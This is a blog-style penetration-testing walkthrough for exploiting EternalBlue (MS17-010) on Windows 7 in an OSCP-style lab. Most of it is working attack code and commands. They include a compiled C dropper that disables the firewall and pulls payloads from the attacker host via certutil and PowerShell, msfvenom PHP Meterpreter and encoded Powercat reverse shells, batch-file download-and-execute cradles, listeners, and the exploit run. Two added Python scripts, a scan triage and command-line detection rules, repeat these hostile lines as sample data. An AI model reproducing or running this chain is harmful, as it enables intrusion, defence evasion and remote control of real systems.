Exploit Eternal Blue (MS17-010) for Windows 7 and higher (custom payload)
Summary
This article shows you how to exploit the MS17-010 vulnerability on Windows 7 or higher.
Disclaimer
This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
Why this post?
During my OSCP training I had a lot of trouble rooting the Eternal Blue targets. After many hours of troubleshooting, it finally worked. I would like to save others from wasting precious lab time.
This walkthrough has been prepared in such a way that it should always work on systems running Windows 7 or higher that are vulnerable to MS17-010. See my other blog for the Windows XP procedure.
We will exploit the 'Eternal Blue' vulnerability with a custom payload. To be exact, we will create an executable file that:
- is not detected as malware by the Windows Defender software
- disables the Windows Firewall
- works on systems without (access to) PowerShell
The end result is 2 different reverse shells (at least one should work for your target):
- a 'stealth' Powercat reverse shell (port 25); this is the one you get on 'Bruce'
- a 'stealth' Meterpreter PHP reverse shell (port 53)
The POC consists of two machines: the victim (Windows 7, 64-bit) and the attacker machine (Kali Linux 2022.1).
Victim:
- Windows 7 Professional [version 6.1 7601]
- IP address: 192.168.62.169
- Security: Default Windows firewall (all profiles enabled).
Attacker (for reverse shell):
- Kali Linux (we will use variables 'kali' or 'LHOST')
- IP-Address: 192.168.62.161
In this guide I will use the terms 'kali' and 'LHOST' interchangeably. Change the IP address to that of your own attacker system.
Prerequisites
We start by installing the prerequisites that must be in place before we can run the exploit.
1. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download and install the latest version of Impacket. Set the directory world-writable (yes, this is necessary).
cd /opt
sudo git clone https://github.com/SecureAuthCorp/impacket.git
sudo chmod 777 /opt/impacket -R
2. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Install the virtualenv tool.
sudo apt install virtualenv
3. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Create and activate a Python 2 virtual environment inside the Impacket directory.
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
Result: you should have a prompt change to ‘(impacket-venv)’.
4. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install pip for python2.
cd /tmp
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py -O /tmp/get-pip.py --no-check-certificate
sudo python2 get-pip.py
5. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install the Impacket requirements and Impacket itself.
cd /opt/impacket
pip install -r requirements.txt
pip install .
Enumeration
Now that your system has the requirements to run the exploit in place, you can start scanning the target machine (Windows 7 in our case).
6. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Use nmap to scan the target machine for SMB vulnerabilities. The loop runs every smb-* script (except the brute-force and flood ones) against port 445 and prints only the result lines.
cd /usr/share/nmap/scripts
target=192.168.62.169
p=445
scriptargs='smbpass=,smbdomain=mydomain.com,unsafe=1'
for script in $(ls smb* | grep -v -e brute -e flood); do
  echo "=== $script ==="
  sudo nmap $target --script=$script --script-args="$scriptargs" -p $p | grep "|"
done
Our target machine is vulnerable to MS17-010!
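Because the loop above runs every smb-* script and prints only the lines containing "|", the one verdict that matters is easy to miss in the output. The Python below is an added example and not part of the original article: it reads that output (from a file or stdin), maps each "=== script ===" banner to the State line nmap's vuln scripts print, and lists the scripts that reported the host as vulnerable. The sample output embedded in it is constructed in the shape the loop prints, not a real scan capture, and the State: line format is assumed from nmap's vuln library.

```python
import re
import sys

# Constructed sample output in the shape the scan loop prints: a "=== script ==="
# banner followed by the nmap result lines that contain "|". Not a real capture.
SAMPLE_SCAN_OUTPUT = """\
=== smb-os-discovery.nse ===
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Computer name: WIN7-VICTIM
=== smb-vuln-ms10-054.nse ===
| smb-vuln-ms10-054: false
=== smb-vuln-ms10-061.nse ===
| smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
=== smb-vuln-ms17-010.nse ===
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     Risk factor: HIGH
=== smb-vuln-ms08-067.nse ===
| smb-vuln-ms08-067:
|   NOT VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: NOT VULNERABLE
"""

BANNER = re.compile(r"^=== (\S+) ===$")
# nmap's vuln library prints "State: VULNERABLE", "State: LIKELY VULNERABLE"
# or "State: NOT VULNERABLE" inside the script result block.
STATE = re.compile(r"^\|\s+State:\s+(.+?)\s*$")


def parse_scan(text):
    """Map each script banner to the State it reported (None if the script
    printed no State line, e.g. smb-os-discovery or a 'false' one-liner)."""
    results = {}
    current = None
    for line in text.splitlines():
        m = BANNER.match(line)
        if m:
            current = m.group(1)
            results[current] = None
            continue
        m = STATE.match(line)
        if m and current is not None:
            results[current] = m.group(1)
    return results


def vulnerable_scripts(text):
    """Names of the scripts whose State is VULNERABLE or LIKELY VULNERABLE."""
    return sorted(
        name for name, state in parse_scan(text).items()
        if state is not None
        and state.endswith("VULNERABLE")
        and not state.startswith("NOT")
    )


if __name__ == "__main__":
    # Pipe the loop's output in:  ... | tee scan.txt; python3 triage.py < scan.txt
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SCAN_OUTPUT
    for name, state in parse_scan(data).items():
        print(f"{name:32s} {state or '-'}")
    print("vulnerable:", ", ".join(vulnerable_scripts(data)) or "none")
```

Run with no input it triages the constructed sample; piped the loop's real output it gives you a one-line summary per script, which is also a handy artefact to keep for the patch-verification pass after the lab (or a real engagement) is over.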
Payload creation (for Windows 7 and higher)
Our final payload will be an executable file that:
- Is not removed by the Windows Defender software
- Disables the Windows Firewall
- Works on systems without Powershell
- Will set up a 'stealth' Powercat reverse shell (port 25)
- Will set up a 'stealth' Meterpreter PHP reverse shell (port 53)
Everything we need in order to run the exploit is copied to the /tmp directory on Kali. We will make this directory available through the Python simple HTTP Server.
7. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Run the shell commands below to generate the C source file /tmp/testexe.c (adjust LHOST to the IP address of your Kali host). The heredoc writes the C file in one go; every backslash that must end up in the C source is written twice, because the unquoted heredoc collapses \\ into \.
LHOST=192.168.62.161
portweb=80
cd /tmp
cat > testexe.c <<EOF
#include <stdlib.h>
int main ()
{
int i;
/* Disable the Windows firewall */
i = system ("netsh advfirewall set allprofiles state off");
/* Download files (certutil first, PowerShell as fallback for backup.bat) */
i = system ("certutil.exe -urlcache -split -f \"http://${LHOST}:${portweb}/backup.bat\" C:\\\\Windows\\\\Tasks\\\\backup.bat");
i = system ("certutil.exe -urlcache -split -f \"http://${LHOST}:${portweb}/php.exe\" C:\\\\Windows\\\\Tasks\\\\php.exe");
i = system ("certutil.exe -urlcache -split -f \"http://${LHOST}:${portweb}/php7.dll\" C:\\\\Windows\\\\Tasks\\\\php7.dll");
i = system ("powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://${LHOST}:${portweb}/backup.bat','C:\\\\Windows\\\\Tasks\\\\backup.bat')");
/* Execute files */
i = system ("ping -n 1 ${LHOST}");
i = system ("START /B c:\\\\Windows\\\\Tasks\\\\backup.bat");
i = system ("icacls c:\\\\Windows\\\\Tasks\\\\* /c /t /grant everyone:f");
return 0;
}
EOF
The result is the source file /tmp/testexe.c.
8. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Compile /tmp/testexe.c to /tmp/ruby.exe (the name ruby.exe is arbitrary; it can be something else if you want).
# Compile as x86 Windows PE file
/usr/bin/i686-w64-mingw32-gcc /tmp/testexe.c -o /tmp/ruby.exe
You have now created a Windows payload file. The next steps are to prepare the related files that will be called by the payload file (ruby.exe).
PHP Meterpreter reverse shell payload
If you are confident that you can use PowerShell on your target, you can skip this PHP section and continue with Powercat. You do not need to adjust the ruby.exe file (steps 7 and 8).
Our final payload file (ruby.exe) will set up a PHP Meterpreter reverse shell on TCP port 53. This is done by the following lines of code:
i = system ("certutil.exe -urlcache -split -f \"http://192.168.62.161:80/backup.bat\" C:\\Windows\\Tasks\\backup.bat");
i = system ("certutil.exe -urlcache -split -f \"http://192.168.62.161:80/php.exe\" C:\\Windows\\Tasks\\php.exe");
i = system ("certutil.exe -urlcache -split -f \"http://192.168.62.161:80/php7.dll\" C:\\Windows\\Tasks\\php7.dll");
You can read more about a ‘stealth’ PHP Meterpreter shell in my article:
9. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download the PHP 7.x binaries for Windows x86. Extract the zip file and copy the two relevant files (php.exe and php7.dll) to our staging directory /tmp. Check https://windows.php.net/downloads/releases for the latest 7.x version and use the name of the latest Win32 x86 php zip file.
phpzip=php-7.4.30-nts-Win32-vc15-x86.zip
mkdir -p /tmp/php-x86
wget https://windows.php.net/downloads/releases/${phpzip} -O /tmp/${phpzip}
cd /tmp/php-x86
unzip /tmp/${phpzip}
cp /tmp/php-x86/php.exe /tmp
cp /tmp/php-x86/php7.dll /tmp
10. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Create the PHP (Meterpreter) reverse shell payloads with msfvenom. One file is written per payload name: /tmp/reverse_php.php and /tmp/meterpreter_reverse_tcp.php.
LHOST=192.168.62.161
LPORT=53
payloads="reverse_php meterpreter_reverse_tcp"
for payload in $payloads; do
  msfvenom -p php/$payload LHOST=$LHOST LPORT=$LPORT -f raw > /tmp/${payload}.php
done
Powercat encoded reverse shell payload
Our final payload file (ruby.exe) will set up a 'stealth' Powercat reverse shell on TCP port 25. This is done by the following line of code:
i = system ("powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.62.161:80/backup.bat','C:\\Windows\\Tasks\\backup.bat')");
You can read more about a ‘stealth’ Powercat reverse shell in my article:
11. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Using PowerShell on Kali (pwsh), download powercat.ps1, run Powercat with the -ge option and write the encoded payload to /tmp/shell-25.txt.
LHOST=192.168.62.161
LPORT=25
rshell=shell-25.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /tmp/$rshell
12. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Create a Windows batch file (/tmp/backup.bat). This batch file is called by our final payload file (ruby.exe).
LHOST=192.168.62.161
portweb=80
rshell=shell-25.txt
echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${LHOST}:${portweb}/${rshell}');iex 'powershell -E \$code'" >/tmp/backup.bat
echo START /B c:\\Windows\\Tasks\\php.exe -d allow_url_fopen=true -r "eval(file_get_contents('http://$LHOST:$portweb/meterpreter_reverse_tcp.php'));" >>/tmp/backup.bat
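Seen from the defender's side, every command that testexe.c (step 7) and backup.bat (step 12) issue is an ordinary process creation that Sysmon (Event ID 1) or Windows Security auditing (Event ID 4688) records with its full command line. The Python below is an added example, not code from this article: it runs a small set of command-line rules over constructed process events modelled on those two files, plus two benign look-alikes that use the same binaries, so that each stage of the dropper (firewall off, certutil and PowerShell download cradles, an encoded PowerShell command, the icacls grant, php.exe evaluating remote code, and execution out of C:\Windows\Tasks) raises its own alert. The event shape, the rule names and the regular expressions are my own assumptions, not a vendor's detection content.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style),
# modelled on the commands testexe.c and backup.bat issue, plus two benign
# look-alikes. Not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil.exe -urlcache -split -f "http://192.168.62.161:80/backup.bat" C:\Windows\Tasks\backup.bat'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.62.161:80/backup.bat','C:\Windows\Tasks\backup.bat')"},
    {"image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r"icacls c:\Windows\Tasks\* /c /t /grant everyone:f"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell -c "$code=(New-Object System.Net.Webclient).DownloadString('http://192.168.62.161:80/shell-25.txt');iex 'powershell -E $code'"'''},
    {"image": r"C:\Windows\Tasks\php.exe",
     "cmdline": r'''c:\Windows\Tasks\php.exe -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.62.161:80/meterpreter_reverse_tcp.php'));"'''},
    # benign look-alikes: same binaries, legitimate use
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Windows\System32\ntoskrnl.exe SHA256"},
    {"image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall show allprofiles"},
]

# (rule name, regex over the command line) -- hypothetical rule set
CMDLINE_RULES = [
    ("firewall_disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I)),
    ("powershell_download_cradle",
     re.compile(r"powershell.*(DownloadFile|DownloadString)\s*\(", re.I)),
    ("powershell_encoded_command",
     re.compile(r"powershell(\.exe)?\s.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("icacls_everyone_full_control",
     re.compile(r"icacls\b.*/grant\s+everyone:f\b", re.I)),
    ("php_remote_eval",
     re.compile(r"php(\.exe)?\s.*-r\s.*eval\s*\(\s*file_get_contents\s*\(\s*['\"]https?://", re.I)),
]

# The dropper stages and launches its files from this world-writable directory.
STAGING_DIR = "c:\\windows\\tasks\\"


def detect(events):
    """Return one alert dict per (event, rule) match."""
    alerts = []
    for ev in events:
        for name, rx in CMDLINE_RULES:
            if rx.search(ev["cmdline"]):
                alerts.append({"rule": name, "image": ev["image"], "cmdline": ev["cmdline"]})
        if ev["image"].lower().startswith(STAGING_DIR):
            alerts.append({"rule": "exec_from_windows_tasks",
                           "image": ev["image"], "cmdline": ev["cmdline"]})
    return alerts


def rule_counts(events):
    """How often each rule fired; a quick way to see which stages are covered."""
    counts = {}
    for alert in detect(events):
        counts[alert["rule"]] = counts.get(alert["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['cmdline'][:90]}")
    print(rule_counts(SAMPLE_EVENTS))
```

The two benign events produce no alert, which is the point of keying on the specific switches (-urlcache with a URL, state off, /grant everyone:f) rather than on the binary names alone; certutil and netsh are used legitimately all day. The chain also shows why a single detection is not enough: if the PowerShell cradle is missed, the certutil download, the icacls change or php.exe starting from C:\Windows\Tasks still gives a defender a hook.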
Set up the required listeners
Next, open a new Bash terminal instance and a new tab for each listener. You will need 5 open tabs for all required listeners.
13. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Set up an HTTP server (the stager) so the target can download the staged files from /tmp. Port 80 is privileged, so run it with sudo.
sudo python3 -m http.server 80 --directory /tmp
14. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Set up a tcpdump ICMP listener (to troubleshoot network issues). Use tun0 instead of eth0 when you are on a VPN.
sudo tcpdump -i eth0 icmp
15. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a PHP Meterpreter listener on port 53 to catch the PHP connection.
LHOST=192.168.62.161
LPORT=53
PAYLOAD=php/meterpreter_reverse_tcp
sudo msfconsole -qn -x "use exploit/multi/handler; set PAYLOAD $PAYLOAD; set LHOST $LHOST; set LPORT $LPORT; run";
16. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a netcat listener on port 25 to catch the Powercat connection.
rlwrap nc -nlvp 25
Prepare the MS17-010 exploit
We have now finished our preparations for the payload. The next section is about running the actual exploit. Open a new Bash terminal instance to execute the commands.
17. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download the exploit.
cd /tmp
git clone https://github.com/helviojunior/MS17-010.git
18. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start the Python 2 virtual environment inside the Impacket folder again (the same commands as in step 3).
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
19. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the Python 2 virtual environment ‘(impacket-venv)’, run the exploit against our target (192.168.62.169) with our payload file (/tmp/ruby.exe).
python2 /tmp/MS17-010/send_and_execute.py 192.168.62.169 /tmp/ruby.exe
Check out our results:
HTTP listener
All files are downloaded. Some files are downloaded more than once; that is intentional redundancy in case PowerShell is not available on the target.
ICMP listener
We have a network connection (we already knew this, because our HTTP listener was hit).
PHP Meterpreter listener
We got a Meterpreter shell. You can also change the payload to have a non-meterpreter shell.
Powercat listener
This worked!
Our exploit against the Windows 7 target worked with 2 different shells.
In my next blog, I will show how to do this with an XP target, so you can root "Alice".